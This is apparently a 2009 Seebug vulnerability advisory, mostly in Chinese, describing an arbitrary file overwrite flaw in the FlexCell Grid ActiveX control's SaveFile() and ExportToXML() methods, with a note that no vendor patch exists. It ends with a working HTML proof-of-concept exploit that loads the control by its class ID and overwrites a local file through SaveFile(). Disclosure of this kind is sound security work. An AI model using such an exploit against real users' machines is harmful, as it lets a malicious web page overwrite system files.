Lucene search
RootSSV:4694HistoryFeb 02, 2009 - 12:00 a.m.
FlexCell Grid ActiveX控件SaveFile()和ExportToXML()方法任意文件覆盖漏洞
2009-02-0200:00:00
Root
www.seebug.org
11
FlexCell Grid ActiveX控件是一款表格控制工具,提供拷贝、拷贝预览、图表、合并单元格等全面功能。
FlexCell Grid ActiveX控件没有正确地验证对SaveFile()和ExportToXML()方法的输入参数,如果远程攻击者受骗访问了恶意网站并向该方式传送了特制参数的话,就可能导致以当前登录用户的权限覆盖任意系统文件。
FlexCell Technologies FlexCell Grid ActiveX 5.x
厂商补丁:
FlexCell Technologies
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<a href=“http://www.grid2000.com/” target=“_blank”>http://www.grid2000.com/</a>
<HTML>
<BODY>
<b>
Author : Houssamix <br/> <br/> <br/>
FlexCell Grid Control 5.6.9 Remote File Overwrite Exploit <br/>
ExportToXML() is vuln to <br/>
<b/>
<object id=hsmx classid="clsid:{2A7D9CCE-211A-4654-9449-718F71ED9644}"></object>
<SCRIPT>
/*
Report for Clsid: {2A7D9CCE-211A-4654-9449-718F71ED9644}
RegKey Safe for Script: Faux
RegKey Safe for Init: Faux
Implements IObjectSafety: Vrai
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
*/
function hehe()
{
File = "c:\\hsmx.txt"
hsmx.SaveFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>